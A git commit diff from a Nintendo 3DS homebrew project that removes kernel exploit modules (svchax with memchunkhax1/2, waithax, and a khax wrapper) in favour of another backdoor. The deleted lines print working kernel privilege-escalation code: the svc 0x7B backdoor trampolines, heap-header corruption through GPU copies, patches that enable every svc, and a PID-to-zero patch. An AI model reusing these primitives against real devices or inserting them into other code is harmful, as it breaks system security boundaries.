Remove kernel exploits, switch to fasthax backdoor.

This commit is contained in:
Steveice10 2017-01-07 15:55:27 -08:00
parent 3137dcb8a6
commit 33737b1292
11 changed files with 99 additions and 1055 deletions

View File

@ -53,23 +53,7 @@ static int util_get_lines(PrintConsole* console, const char* str) {
return lines;
}
static const devoptab_t* consoleStdOut = NULL;
static const devoptab_t* consoleStdErr = NULL;
// Capture the stdout/stderr devoptab entries currently installed (by the
// consoleInit() call in init()) so util_panic() can later restore console
// output even if something has replaced the devoptabs in the meantime.
void util_store_console_std() {
    consoleStdOut = devoptab_list[STD_OUT];
    consoleStdErr = devoptab_list[STD_ERR];
}
void util_panic(const char* s, ...) {
if(consoleStdOut != NULL) {
devoptab_list[STD_OUT] = consoleStdOut;
}
if(consoleStdErr != NULL) {
devoptab_list[STD_ERR] = consoleStdErr;
}
va_list list;
va_start(list, s);
@ -131,10 +115,6 @@ void util_panic(const char* s, ...) {
gfxFlushBuffers();
gspWaitForVBlank();
util_panic_quiet();
}
void util_panic_quiet() {
while(aptMainLoop()) {
hidScanInput();
if(hidKeysDown() & ~KEY_TOUCH) {

View File

@ -38,9 +38,7 @@ typedef struct {
u16 animationSequence[0x40];
} BNR;
void util_store_console_std();
void util_panic(const char* s, ...);
void util_panic_quiet();
FS_Path* util_make_path_utf8(const char* path);
void util_free_path_utf8(FS_Path* path);

View File

@ -1,114 +0,0 @@
#include <3ds.h>
#include <stdio.h>
#include "khax.h"
#include "svchax/svchax.h"
#include "waithax/waithax.h"
// Kernel-mode address holding the pointer to the currently running KProcess.
#define CURRENT_KPROCESS 0xFFFF9004

// Entry point that runs a function in kernel mode (svcBackdoor-compatible).
static void (*khax_backdoor)(void (*func)());

// Parameter/result slots for the kernel-mode helpers below. Marked volatile
// because they are written in user mode and read in kernel mode (and back).
static volatile u32 khax_read32_kernel_addr;
static volatile u32 khax_read32_kernel_result;
static volatile u32 khax_write32_kernel_addr;
static volatile u32 khax_write32_kernel_value;

// Runs in kernel mode: reads the u32 at khax_read32_kernel_addr.
static void khax_read32_kernel_priv() {
    asm volatile("cpsid aif"); // mask interrupts while running privileged
    khax_read32_kernel_result = *(u32*) khax_read32_kernel_addr;
}

// Reads a u32 from a kernel virtual address via the backdoor.
static u32 khax_read32_kernel(u32 addr) {
    khax_read32_kernel_addr = addr;
    khax_backdoor(khax_read32_kernel_priv);
    return khax_read32_kernel_result;
}

// Runs in kernel mode: writes khax_write32_kernel_value to ..._addr.
static void khax_write32_kernel_priv() {
    asm volatile("cpsid aif");
    *(u32*) khax_write32_kernel_addr = khax_write32_kernel_value;
}

// Writes a u32 to a kernel virtual address via the backdoor.
static void khax_write32_kernel(u32 addr, u32 value) {
    khax_write32_kernel_addr = addr;
    khax_write32_kernel_value = value;
    khax_backdoor(khax_write32_kernel_priv);
}
// Gains kernel-mode execution and privileged srv access.
//
// 3DSX (homebrew) builds pick a kernel exploit by kernel version: waithax
// for 2.50-11 < kver <= 2.51-2, svchax for kver <= 2.50-11; CIA/3DS builds
// are assumed to already have svcBackdoor access. Afterwards the process'
// PID is temporarily patched to 0 and srv re-initialized to obtain
// privileged service access. Returns true on success; progress and errors
// are printed to the console.
bool khax_execute() {
    printf("khax: Retrieving system information...\n");

    u32 kver = osGetKernelVersion();

    bool n3ds = false;
    APT_CheckNew3DS(&n3ds);

    void (*khax_cleanup)() = NULL;

    if(envIsHomebrew()) {
        printf("khax: Choosing exploit to execute...\n");

        if(kver > SYSTEM_VERSION(2, 51, 2)) {
            printf("khax: Unsupported firmware version.\n");
            return false;
        } else if(kver > SYSTEM_VERSION(2, 50, 11)) {
            printf("khax: Executing waithax...\n");

            // waithax is slow; enable the New 3DS speedup while it runs.
            osSetSpeedupEnable(true);

            if(!waithax_run()) {
                printf("khax: waithax failed.\n");
                return false;
            }

            osSetSpeedupEnable(false);

            khax_backdoor = waithax_backdoor;
            khax_cleanup = waithax_cleanup;
        } else {
            printf("khax: Executing svchax...\n");

            svchax_init(false);
            if(!__ctr_svchax) {
                printf("khax: svchax failed.\n");
                return false;
            }

            // svchax enables all svcs, so plain svcBackdoor works from here.
            khax_backdoor = (void (*)(void (*func)())) svcBackdoor;
            khax_cleanup = NULL;
        }

        printf("khax: Kernel exploit executed successfully.\n");
    } else {
        printf("khax: Not running as a 3DSX; assuming CIA/3DS with svcBackdoor access.\n");

        khax_backdoor = (void (*)(void (*func)())) svcBackdoor;
        khax_cleanup = NULL;
    }

    printf("khax: Retrieving PID kernel address...\n");

    // KProcess PID offset depends on model and kernel version.
    u32 pidAddr = khax_read32_kernel(CURRENT_KPROCESS) + (n3ds ? 0xBC : (kver > SYSTEM_VERSION(2, 40, 0)) ? 0xB4 : 0xAC);

    printf("khax: Backing up PID and patching to 0...\n");

    u32 oldPid = khax_read32_kernel(pidAddr);
    khax_write32_kernel(pidAddr, 0);

    printf("khax: Reinitializing srv...\n");

    // Re-registering with srv while the PID reads 0 grants privileged
    // service access to this process.
    srvExit();
    srvInit();

    printf("khax: Restoring PID...\n");

    khax_write32_kernel(pidAddr, oldPid);

    printf("khax: Cleaning up...\n");

    if(khax_cleanup != NULL) {
        khax_cleanup();
    }

    printf("khax: Success.\n");
    return true;
}

View File

@ -1,3 +0,0 @@
#pragma once

// Obtains kernel-mode execution and privileged srv access (see khax.c).
// Returns true on success.
bool khax_execute();

View File

@ -1,498 +0,0 @@
#include <3ds.h>
#include <stdio.h>
#include <string.h>
#include <malloc.h>
#include "svchax.h"
#define CURRENT_KTHREAD 0xFFFF9000
#define CURRENT_KPROCESS 0xFFFF9004
#define CURRENT_KPROCESS_HANDLE 0xFFFF8001
#define RESOURCE_LIMIT_THREADS 0x2
#define MCH2_THREAD_COUNT_MAX 0x20
#define MCH2_THREAD_STACKS_SIZE 0x1000
#define SVC_ACL_OFFSET(svc_id) (((svc_id) >> 5) << 2)
#define SVC_ACL_MASK(svc_id) (0x1 << ((svc_id) & 0x1F))
#define THREAD_PAGE_ACL_OFFSET 0xF38
u32 __ctr_svchax = 0;
u32 __ctr_svchax_srv = 0;
extern void* __service_ptr;
// Signature of a function run in kernel mode through svc_7b.
typedef u32(*backdoor_fn)(u32 arg0, u32 arg1);

// Invokes svc 0x7B (Backdoor) to run entry_fn in kernel mode. The variadic
// arguments (up to two) are pushed onto the user stack; the instructions
// after the first "bx lr" form the kernel-mode trampoline whose address is
// computed into r0 as pc + 12 before the svc. The trampoline loads the two
// arguments, calls entry_fn, and stores its result back on the user stack.
__attribute((naked))
static u32 svc_7b(backdoor_fn entry_fn, ...) // can pass up to two arguments to entry_fn(...)
{
    __asm__ volatile(
        "push {r0, r1, r2} \n\t"
        "mov r3, sp \n\t"
        "add r0, pc, #12 \n\t"
        "svc 0x7B \n\t"
        "add sp, sp, #8 \n\t"
        "ldr r0, [sp], #4 \n\t"
        "bx lr \n\t"
        "cpsid aif \n\t"
        "ldr r2, [r3], #4 \n\t"
        "ldmfd r3!, {r0, r1} \n\t"
        "push {r3, lr} \n\t"
        "blx r2 \n\t"
        "pop {r3, lr} \n\t"
        "str r0, [r3, #-4]! \n\t"
        "bx lr \n\t");
    return 0; // unreachable; silences the compiler for the naked function
}
// Runs in kernel mode (via svc_7b): overwrites the svc access control masks
// of the current thread and process with all-ones, enabling every svc.
// The pointer offsets into KThread/KProcess differ between Old and New 3DS.
static void k_enable_all_svcs(u32 isNew3DS)
{
    u32* thread_ACL = *(*(u32***)CURRENT_KTHREAD + 0x22) - 0x6;
    u32* process_ACL = *(u32**)CURRENT_KPROCESS + (isNew3DS ? 0x24 : 0x22);

    memset(thread_ACL, 0xFF, 0x10);
    memset(process_ACL, 0xFF, 0x10);
}
// Kernel-mode helper: dereference a kernel address (argument via svc_7b).
static u32 k_read_kaddr(u32* kaddr)
{
    return *kaddr;
}

// Reads a u32 from a kernel virtual address using the svc 0x7B backdoor.
static u32 read_kaddr(u32 kaddr)
{
    return svc_7b((backdoor_fn)k_read_kaddr, kaddr);
}

// Kernel-mode helper: store val at a kernel address.
static u32 k_write_kaddr(u32* kaddr, u32 val)
{
    *kaddr = val;
    return 0;
}

// Writes a u32 to a kernel virtual address using the svc 0x7B backdoor.
static void write_kaddr(u32 kaddr, u32 val)
{
    svc_7b((backdoor_fn)k_write_kaddr, kaddr, val);
}
// Returns the base address of a thread-related kernel page: issues svc 0x2A
// with a stack-local out-buffer and rounds the value returned in r1 down to
// a 0x1000 page boundary.
// NOTE(review): this relies on svc 0x2A leaking a pointer in r1 on the
// targeted firmwares — confirm against the kernel svc table before reuse.
__attribute__((naked))
static u32 get_thread_page(void)
{
    __asm__ volatile(
        "sub r0, sp, #8 \n\t"
        "mov r1, #1 \n\t"
        "mov r2, #0 \n\t"
        "svc 0x2A \n\t"
        "mov r0, r1, LSR#12 \n\t" // round r1 down to page granularity
        "mov r0, r0, LSL#12 \n\t"
        "bx lr \n\t");
    return 0; // unreachable; silences the compiler for the naked function
}
// Arguments handed to each candidate "target" thread.
typedef struct
{
    Handle started_event;      // signaled by the thread once it has started
    Handle lock;               // thread blocks on this until released
    volatile u32 target_kaddr; // kernel address to patch (0 = nothing to do)
    volatile u32 target_val;   // value to write at target_kaddr
} mch2_thread_args_t;

// Book-keeping for one spawned thread.
typedef struct
{
    u32* stack_top;
    Handle handle;
    bool keep;                 // set when the thread's TLS came out page-aligned
    mch2_thread_args_t args;
} mch2_thread_t;

// All state for one memchunkhax2 run.
typedef struct
{
    u32 old_cpu_time_limit;    // APT cpu-time limit to restore afterwards
    bool isNew3DS;
    u32 kernel_fcram_mapping_offset; // physical -> kernel-virtual FCRAM delta
    Handle arbiter;
    volatile u32 alloc_address; // where alloc_thread_entry allocates
    volatile u32 alloc_size;
    u8* flush_buffer;          // scratch used to force cache eviction
    Handle dummy_threads_lock;
    Handle target_threads_lock;
    Handle main_thread_lock;
    u32* thread_page_va;
    u32 thread_page_kva;       // kernel VA of the targeted thread page
    u32 threads_limit;         // how many threads this process may still create
    Handle alloc_thread;
    Handle poll_thread;
    mch2_thread_t threads[MCH2_THREAD_COUNT_MAX];
} mch2_vars_t;
// Thread entry: performs the MEMOP_ALLOC that the main thread synchronizes
// against via svcArbitrateAddress on mch2->alloc_address.
static void alloc_thread_entry(mch2_vars_t* mch2)
{
    u32 tmp;
    svcControlMemory(&tmp, mch2->alloc_address, 0x0, mch2->alloc_size, MEMOP_ALLOC, MEMPERM_READ | MEMPERM_WRITE);
    svcExitThread();
}

// Thread entry: park until the shared lock is signaled, then exit.
static void dummy_thread_entry(Handle lock)
{
    svcWaitSynchronization(lock, U64_MAX);
    svcExitThread();
}

// Thread entry: report whether this thread's TLS landed page-aligned.
static void check_tls_thread_entry(bool* keep)
{
    *keep = !((u32)getThreadLocalStorage() & 0xFFF);
    svcExitThread();
}

// Thread entry: announce start, wait for release, then (if armed) patch
// target_kaddr in kernel memory via the svc 0x7B write primitive.
static void target_thread_entry(mch2_thread_args_t* args)
{
    svcSignalEvent(args->started_event);
    svcWaitSynchronization(args->lock, U64_MAX);

    if (args->target_kaddr)
        write_kaddr(args->target_kaddr, args->target_val);

    svcExitThread();
}
/*
 * Computes the kernel-virtual address of the first unused BASE-region FCRAM
 * page: end of the kernel's FCRAM mapping, minus the non-linear BASE usage,
 * minus one page to step onto the next free page.
 */
static u32 get_first_free_basemem_page(bool isNew3DS)
{
    u32 kver = osGetKernelVersion();

    // Kernel-reported allocation info (guessed meaning, as in the original).
    s64 kernelInfo;
    svcGetSystemInfo(&kernelInfo, 2, 0);

    int linearUsed = 0x6C000 + kernelInfo +
        (kver > SYSTEM_VERSION(2, 49, 0) ? (isNew3DS ? 0x2000 : 0x1000) : 0x0);

    int baseUsed = osGetMemRegionUsed(MEMREGION_BASE);

    u32 fcramMapping = (kver > SYSTEM_VERSION(2, 40, 0)) ? 0xE0000000 : 0xF0000000; // kernel FCRAM mapping
    u32 fcramSize = isNew3DS ? 0x10000000 : 0x08000000;                             // FCRAM size

    return fcramMapping + fcramSize
           - (baseUsed - linearUsed) // pages allocated without MEMOP_LINEAR
           - 0x1000;                 // skip to the start of the next free page
}
// Returns how many additional threads this process may still create,
// capped at MCH2_THREAD_COUNT_MAX (the size of the exploit's thread table).
static u32 get_threads_limit(void)
{
    u32 limitName = RESOURCE_LIMIT_THREADS;
    s64 currentThreads = 0;
    s64 maxThreads = 0;

    Handle limitHandle;
    svcGetResourceLimit(&limitHandle, CURRENT_KPROCESS_HANDLE);
    svcGetResourceLimitCurrentValues(&currentThreads, limitHandle, &limitName, 1);
    svcGetResourceLimitLimitValues(&maxThreads, limitHandle, &limitName, 1);
    svcCloseHandle(limitHandle);

    if (maxThreads > MCH2_THREAD_COUNT_MAX)
        maxThreads = MCH2_THREAD_COUNT_MAX;

    return maxThreads - currentThreads;
}
/*
 * memchunkhax2: overwrites a free heap-chunk header via GPU DMA so that a
 * racing MEMOP_ALLOC maps a kernel base-memory page into this process, then
 * spawns threads until one's kernel thread object lands in that page and
 * patches the svc ACL to enable svc 0x7B. Statement order, priorities and
 * cache flushes are all load-bearing — do not reorder.
 */
static void do_memchunkhax2(void)
{
    static u8 flush_buffer[0x8000];
    static u8 thread_stacks[MCH2_THREAD_STACKS_SIZE];

    int i;
    u32 tmp;
    mch2_vars_t mch2 = {0};

    mch2.flush_buffer = flush_buffer;
    mch2.threads_limit = get_threads_limit();
    mch2.kernel_fcram_mapping_offset = (osGetKernelVersion() > SYSTEM_VERSION(2, 40, 0)) ? 0xC0000000 : 0xD0000000;

    for (i = 0; i < MCH2_THREAD_COUNT_MAX; i++)
        mch2.threads[i].stack_top = (u32*)((u32)thread_stacks + (i + 1) * (MCH2_THREAD_STACKS_SIZE / MCH2_THREAD_COUNT_MAX));

    APT_CheckNew3DS(&mch2.isNew3DS);
    APT_GetAppCpuTimeLimit(&mch2.old_cpu_time_limit);
    APT_SetAppCpuTimeLimit(5);

    // Probe which thread slots come with page-aligned TLS; those are kept.
    for (i = 0; i < mch2.threads_limit; i++)
    {
        svcCreateThread(&mch2.threads[i].handle, (ThreadFunc)check_tls_thread_entry, (u32)&mch2.threads[i].keep,
                        mch2.threads[i].stack_top, 0x18, 0);
        svcWaitSynchronization(mch2.threads[i].handle, U64_MAX);
    }

    for (i = 0; i < mch2.threads_limit; i++)
        if (!mch2.threads[i].keep)
            svcCloseHandle(mch2.threads[i].handle);

    // Park dummy threads on an event, then release and reap them in reverse
    // creation order (descending priority) — presumably to groom the
    // kernel's thread-page allocations; confirm against the original
    // memchunkhax2 write-up.
    svcCreateEvent(&mch2.dummy_threads_lock, 1);
    svcClearEvent(mch2.dummy_threads_lock);

    for (i = 0; i < mch2.threads_limit; i++)
        if (!mch2.threads[i].keep)
            svcCreateThread(&mch2.threads[i].handle, (ThreadFunc)dummy_thread_entry, mch2.dummy_threads_lock,
                            mch2.threads[i].stack_top, 0x3F - i, 0);

    svcSignalEvent(mch2.dummy_threads_lock);

    for (i = mch2.threads_limit - 1; i >= 0; i--)
        if (!mch2.threads[i].keep)
        {
            svcWaitSynchronization(mch2.threads[i].handle, U64_MAX);
            svcCloseHandle(mch2.threads[i].handle);
            mch2.threads[i].handle = 0;
        }

    svcSleepThread(40000000LL);
    svcCloseHandle(mch2.dummy_threads_lock);

    // Carve the linear heap into an alternating allocated/free pattern so a
    // free-chunk header sits at a known, GPU-reachable location.
    u32 fragmented_address = 0;

    mch2.arbiter = __sync_get_arbiter();

    u32 linear_buffer;
    svcControlMemory(&linear_buffer, 0, 0, 0x1000, MEMOP_ALLOC_LINEAR, MEMPERM_READ | MEMPERM_WRITE);

    u32 linear_size = 0xF000;
    u32 skip_pages = 2;

    mch2.alloc_size = ((((linear_size - (skip_pages << 12)) + 0x1000) >> 13) << 12);

    u32 mem_free = osGetMemRegionFree(MEMREGION_APPLICATION);
    u32 fragmented_size = mem_free - linear_size;

    extern u32 __ctru_heap;
    extern u32 __ctru_heap_size;
    fragmented_address = __ctru_heap + __ctru_heap_size;

    u32 linear_address;

    mch2.alloc_address = fragmented_address + fragmented_size;

    svcControlMemory(&linear_address, 0x0, 0x0, linear_size, MEMOP_ALLOC_LINEAR,
                     MEMPERM_READ | MEMPERM_WRITE);

    if (fragmented_size)
        svcControlMemory(&tmp, (u32)fragmented_address, 0x0, fragmented_size, MEMOP_ALLOC,
                         MEMPERM_READ | MEMPERM_WRITE);

    if (skip_pages)
        svcControlMemory(&tmp, (u32)linear_address, 0x0, (skip_pages << 12), MEMOP_FREE, MEMPERM_DONTCARE);

    for (i = skip_pages; i < (linear_size >> 12) ; i += 2)
        svcControlMemory(&tmp, (u32)linear_address + (i << 12), 0x0, 0x1000, MEMOP_FREE, MEMPERM_DONTCARE);

    u32 alloc_address_kaddr = osConvertVirtToPhys((void*)linear_address) + mch2.kernel_fcram_mapping_offset;

    mch2.thread_page_kva = get_first_free_basemem_page(mch2.isNew3DS) - 0x10000; // skip down 16 pages

    // Forge a free-chunk header whose "next" pointer is the thread page.
    ((u32*)linear_buffer)[0] = 1;
    ((u32*)linear_buffer)[1] = mch2.thread_page_kva;
    ((u32*)linear_buffer)[2] = alloc_address_kaddr + (((mch2.alloc_size >> 12) - 3) << 13) + (skip_pages << 12);

    u32 dst_memchunk = linear_address + (((mch2.alloc_size >> 12) - 2) << 13) + (skip_pages << 12);

    // Evict CPU cache lines so the GPU copy below sees coherent memory.
    memcpy(flush_buffer, flush_buffer + 0x4000, 0x4000);
    GSPGPU_InvalidateDataCache((void*)dst_memchunk, 16);
    GSPGPU_FlushDataCache((void*)linear_buffer, 16);
    memcpy(flush_buffer, flush_buffer + 0x4000, 0x4000);

    // Start the allocation on a helper thread and overwrite the free-chunk
    // header via GPU DMA while the kernel allocator walks the free list.
    svcCreateThread(&mch2.alloc_thread, (ThreadFunc)alloc_thread_entry, (u32)&mch2,
                    mch2.threads[MCH2_THREAD_COUNT_MAX - 1].stack_top, 0x3F, 1);

    while ((u32) svcArbitrateAddress(mch2.arbiter, mch2.alloc_address, ARBITRATION_WAIT_IF_LESS_THAN_TIMEOUT, 0,
                                     0) == 0xD9001814);

    GX_TextureCopy((void*)linear_buffer, 0, (void*)dst_memchunk, 0, 16, 8);
    memcpy(flush_buffer, flush_buffer + 0x4000, 0x4000);
    gspWaitForPPF();

    svcWaitSynchronization(mch2.alloc_thread, U64_MAX);
    svcCloseHandle(mch2.alloc_thread);

    // If the race won, the last allocated page is the kernel thread page.
    u32* mapped_page = (u32*)(mch2.alloc_address + mch2.alloc_size - 0x1000);

    volatile u32* thread_ACL = &mapped_page[THREAD_PAGE_ACL_OFFSET >> 2];

    svcCreateEvent(&mch2.main_thread_lock, 0);
    svcCreateEvent(&mch2.target_threads_lock, 1);
    svcClearEvent(mch2.target_threads_lock);

    // Spawn threads until one's kernel svc ACL shows up in the mapped page,
    // then arm that thread to patch its own ACL (enable svc 0x7B).
    for (i = 0; i < mch2.threads_limit; i++)
    {
        if (mch2.threads[i].keep)
            continue;

        mch2.threads[i].args.started_event = mch2.main_thread_lock;
        mch2.threads[i].args.lock = mch2.target_threads_lock;
        mch2.threads[i].args.target_kaddr = 0;

        thread_ACL[0] = 0;
        GSPGPU_FlushDataCache((void*)thread_ACL, 16);
        GSPGPU_InvalidateDataCache((void*)thread_ACL, 16);

        svcClearEvent(mch2.main_thread_lock);
        svcCreateThread(&mch2.threads[i].handle, (ThreadFunc)target_thread_entry, (u32)&mch2.threads[i].args,
                        mch2.threads[i].stack_top, 0x18, 0);
        svcWaitSynchronization(mch2.main_thread_lock, U64_MAX);

        if (thread_ACL[0])
        {
            thread_ACL[SVC_ACL_OFFSET(0x7B) >> 2] = SVC_ACL_MASK(0x7B);
            GSPGPU_FlushDataCache((void*)thread_ACL, 16);
            GSPGPU_InvalidateDataCache((void*)thread_ACL, 16);

            mch2.threads[i].args.target_kaddr = get_thread_page() + THREAD_PAGE_ACL_OFFSET + SVC_ACL_OFFSET(0x7B);
            mch2.threads[i].args.target_val = SVC_ACL_MASK(0x7B);

            break;
        }
    }

    // Release all target threads; the armed one performs the kernel write.
    svcSignalEvent(mch2.target_threads_lock);

    for (i = 0; i < mch2.threads_limit; i++)
    {
        if (!mch2.threads[i].handle)
            continue;

        if (!mch2.threads[i].keep)
            svcWaitSynchronization(mch2.threads[i].handle, U64_MAX);

        svcCloseHandle(mch2.threads[i].handle);
    }

    svcCloseHandle(mch2.target_threads_lock);
    svcCloseHandle(mch2.main_thread_lock);

    // Undo the heap surgery and repair the allocator's free-list links.
    svcControlMemory(&tmp, mch2.alloc_address, 0, mch2.alloc_size, MEMOP_FREE, MEMPERM_DONTCARE);
    write_kaddr(alloc_address_kaddr + linear_size - 0x3000 + 0x4, alloc_address_kaddr + linear_size - 0x1000);

    svcControlMemory(&tmp, (u32)fragmented_address, 0x0, fragmented_size, MEMOP_FREE, MEMPERM_DONTCARE);

    for (i = 1 + skip_pages; i < (linear_size >> 12) ; i += 2)
        svcControlMemory(&tmp, (u32)linear_address + (i << 12), 0x0, 0x1000, MEMOP_FREE, MEMPERM_DONTCARE);

    svcControlMemory(&tmp, linear_buffer, 0, 0x1000, MEMOP_FREE, MEMPERM_DONTCARE);

    APT_SetAppCpuTimeLimit(mch2.old_cpu_time_limit);
}
// "gspwn": copies memory via the GPU (GX_TextureCopy), bypassing CPU memory
// protection. The flush_buffer memcpys are presumably there to force CPU
// cache eviction around the DMA; the explicit GSP flush/invalidate calls
// keep src/dst coherent with the GPU.
static void gspwn(u32 dst, u32 src, u32 size, u8* flush_buffer)
{
    memcpy(flush_buffer, flush_buffer + 0x4000, 0x4000);

    GSPGPU_InvalidateDataCache((void*)dst, size);
    GSPGPU_FlushDataCache((void*)src, size);

    memcpy(flush_buffer, flush_buffer + 0x4000, 0x4000);

    GX_TextureCopy((void*)src, 0, (void*)dst, 0, size, 8);
    gspWaitForPPF();

    memcpy(flush_buffer, flush_buffer + 0x4000, 0x4000);
}
/* pseudo-code:
* if(val2)
* {
* *(u32*)val1 = val2;
* *(u32*)(val2 + 8) = (val1 - 4);
* }
* else
* *(u32*)val1 = 0x0;
*/
// X-X--X-X
// X-XXXX-X
/*
 * memchunkhax1 write primitive (see pseudo-code above): corrupts free-chunk
 * headers in the linear heap via GPU copies so that the kernel allocator's
 * unlink on the next MEMOP_ALLOC_LINEAR performs the arbitrary write pair.
 * The exact free/copy ordering is what shapes the free list — do not
 * reorder.
 */
static void memchunkhax1_write_pair(u32 val1, u32 val2)
{
    u32 linear_buffer;
    u8* flush_buffer;
    u32 tmp;

    u32* next_ptr3;
    u32* prev_ptr3;

    u32* next_ptr1;
    u32* prev_ptr6;

    svcControlMemory(&linear_buffer, 0, 0, 0x10000, MEMOP_ALLOC_LINEAR, MEMPERM_READ | MEMPERM_WRITE);
    flush_buffer = (u8*)(linear_buffer + 0x8000);

    // Punch holes to create free chunks at +0x1000, +0x3000..0x4FFF, +0x6000.
    svcControlMemory(&tmp, linear_buffer + 0x1000, 0, 0x1000, MEMOP_FREE, 0);
    svcControlMemory(&tmp, linear_buffer + 0x3000, 0, 0x2000, MEMOP_FREE, 0);
    svcControlMemory(&tmp, linear_buffer + 0x6000, 0, 0x1000, MEMOP_FREE, 0);

    // Copy the (now unmapped) free-chunk headers into mapped pages via GPU.
    next_ptr1 = (u32*)(linear_buffer + 0x0004);
    gspwn(linear_buffer + 0x0000, linear_buffer + 0x1000, 16, flush_buffer);

    next_ptr3 = (u32*)(linear_buffer + 0x2004);
    prev_ptr3 = (u32*)(linear_buffer + 0x2008);
    gspwn(linear_buffer + 0x2000, linear_buffer + 0x3000, 16, flush_buffer);

    prev_ptr6 = (u32*)(linear_buffer + 0x5008);
    gspwn(linear_buffer + 0x5000, linear_buffer + 0x6000, 16, flush_buffer);

    // Unlink the middle chunk and aim its link pointers at the target pair.
    *next_ptr1 = *next_ptr3;
    *prev_ptr6 = *prev_ptr3;
    *prev_ptr3 = val1 - 4;
    *next_ptr3 = val2;
    gspwn(linear_buffer + 0x3000, linear_buffer + 0x2000, 16, flush_buffer);

    // This allocation walks the corrupted free list and performs the write.
    svcControlMemory(&tmp, 0, 0, 0x2000, MEMOP_ALLOC_LINEAR, MEMPERM_READ | MEMPERM_WRITE);

    // Restore the original headers and release everything.
    gspwn(linear_buffer + 0x1000, linear_buffer + 0x0000, 16, flush_buffer);
    gspwn(linear_buffer + 0x6000, linear_buffer + 0x5000, 16, flush_buffer);

    svcControlMemory(&tmp, linear_buffer + 0x0000, 0, 0x1000, MEMOP_FREE, 0);
    svcControlMemory(&tmp, linear_buffer + 0x2000, 0, 0x4000, MEMOP_FREE, 0);
    svcControlMemory(&tmp, linear_buffer + 0x7000, 0, 0x9000, MEMOP_FREE, 0);
}
// Enables svc 0x7B via the memchunkhax1 write pair: writes 0x1F000000 over
// the svc ACL word for 0x7B. Per the pseudo-code above, the pair write also
// clobbers *(val2 + 8) == 0x1F000008 (VRAM), so that word is saved first
// and restored afterwards using the freshly enabled svc 0x7B.
static void do_memchunkhax1(void)
{
    u32 saved_vram_value = *(u32*)0x1F000008;

    // 0x1F000000 contains the enable bit for svc 0x7B
    memchunkhax1_write_pair(get_thread_page() + THREAD_PAGE_ACL_OFFSET + SVC_ACL_OFFSET(0x7B), 0x1F000000);

    write_kaddr(0x1F000008, saved_vram_value);
}
// Grants full svc access to the calling thread and process (see the header
// comment in svchax.h): runs memchunkhax1/2 as needed to enable svc 0x7B,
// then uses it to set all svc ACL bits. Optionally patches srv access.
// Returns 0 on success, -1 on unsupported kernel versions.
Result svchax_init(bool patch_srv)
{
    bool isNew3DS;
    APT_CheckNew3DS(&isNew3DS);

    u32 kver = osGetKernelVersion();

    if (!__ctr_svchax)
    {
        // __service_ptr is non-NULL for 3DSX builds, which need an exploit;
        // CIA builds are assumed to already have svcBackdoor (svc 0x7B).
        if (__service_ptr)
        {
            if (kver > SYSTEM_VERSION(2, 50, 11))
                return -1; // no supported memchunkhax variant
            else if (kver > SYSTEM_VERSION(2, 46, 0))
                do_memchunkhax2();
            else
                do_memchunkhax1();
        }

        svc_7b((backdoor_fn)k_enable_all_svcs, isNew3DS);

        __ctr_svchax = 1;
    }

    if (patch_srv && !__ctr_svchax_srv)
    {
        // Temporarily patch this process' PID to 0 and re-register with srv
        // to obtain privileged service access, then restore the PID.
        u32 PID_kaddr = read_kaddr(CURRENT_KPROCESS) + (isNew3DS ? 0xBC : (kver > SYSTEM_VERSION(2, 40, 0)) ? 0xB4 : 0xAC);
        u32 old_PID = read_kaddr(PID_kaddr);

        write_kaddr(PID_kaddr, 0);

        srvExit();
        srvInit();

        write_kaddr(PID_kaddr, old_PID);

        __ctr_svchax_srv = 1;
    }

    return 0;
}

View File

@ -1,47 +0,0 @@
#ifndef __SVCHAX_H__
// Fix: the guard previously defined _SVCHAX_H__ (one leading underscore),
// which does not match the #ifndef above, so double inclusion was never
// actually prevented.
#define __SVCHAX_H__

/*
 * for 3DSX builds, svchax_init expects that:
 *
 * - gfxInit was already called.
 * - new 3DS higher clockrate and L2 cache are disabled.
 * - there is at least 64 KBytes (16 pages) of unallocated linear memory.
 *   (the current 3dsx loaders and ctrulib's default allocator will keep 1MB
 *   of unallocated linear memory, so this is only relevant when using
 *   a custom allocator)
 *
 *
 * svchax_init will grant full svc access to the calling thread and process
 * up to system version 10.7 (kernel version 2.50-11), by using:
 * - memchunkhax1 for kernel version <= 2.46-0
 * - memchunkhax2 for 2.46-0 < kernel version <= 2.50-11
 *
 * access to privileged services can also be obtained by calling
 * svchax_init with patch_srv set to true.
 *
 * __ctr_svchax and __ctr_svchax_srv will reflect the current
 * status of the privileged access for svc calls and services respectively.
 *
 * svchax assumes that CIA builds already have access to svcBackdoor
 * and will skip running memchunkhax there.
 *
 */

#include <3ds/types.h>

#ifdef __cplusplus
extern "C" {
#endif

// Grants full svc access (and, if patch_srv, privileged service access)
// to the calling thread/process. Returns 0 on success.
Result svchax_init(bool patch_srv);

// Non-zero once svc access / privileged service access has been obtained.
extern u32 __ctr_svchax;
extern u32 __ctr_svchax_srv;

#ifdef __cplusplus
}
#endif

#endif //__SVCHAX_H__

View File

@ -1,9 +0,0 @@
#pragma once

#include <3ds/types.h>

// Signature of a function run in kernel mode through svc_7b.
typedef u32(*backdoor_fn)(u32 arg0, u32 arg1);

// Defined in svc.s: runs entry_fn in kernel mode via svc 0x7B.
u32 svc_7b(void* entry_fn, ...); // can pass up to two arguments to entry_fn(...)

// Defined in svc.s: svc 0x15 wrapper that additionally returns the created
// KSemaphore's kernel address through *kaddr.
Result svcCreateSemaphoreKAddr(Handle *semaphore, s32 initialCount, s32 maxCount, u32 **kaddr);

View File

@ -1,41 +0,0 @@
.arm
.section .text

@ Shamelessly based on Steveice's memchunkhax2 repo. I miss those old days
@ Credits to TuxSH for finding this leak
@ Please don't expect KTM for this

@ Result svcCreateSemaphoreKAddr(Handle *semaphore, s32 initialCount,
@                                s32 maxCount, u32 **kaddr)
@ Wraps svc 0x15 (CreateSemaphore) and additionally stores the kernel
@ address of the created KSemaphore (leaked by the svc in r2), adjusted
@ down by 4, into *kaddr.
.global svcCreateSemaphoreKAddr
.type svcCreateSemaphoreKAddr, %function
svcCreateSemaphoreKAddr:
str r0, [sp, #-4]!      @ save out-param: Handle* semaphore
str r3, [sp, #-4]!      @ save out-param: u32** kaddr
svc 0x15                @ CreateSemaphore(initialCount, maxCount)
ldr r3, [sp], #4        @ pop kaddr
sub r2, r2, #4 @ Fix the kobject ptr
str r2, [r3]            @ *kaddr = kernel object address
ldr r3, [sp], #4        @ pop semaphore
str r1, [r3]            @ *semaphore = new handle
bx lr

@ Here for debug/dev purposes
@ u32 svc_7b(void* entry_fn, ...)
@ Runs entry_fn in kernel mode via svc 0x7B (Backdoor), passing up to two
@ arguments through a block pushed on the user stack. The code after the
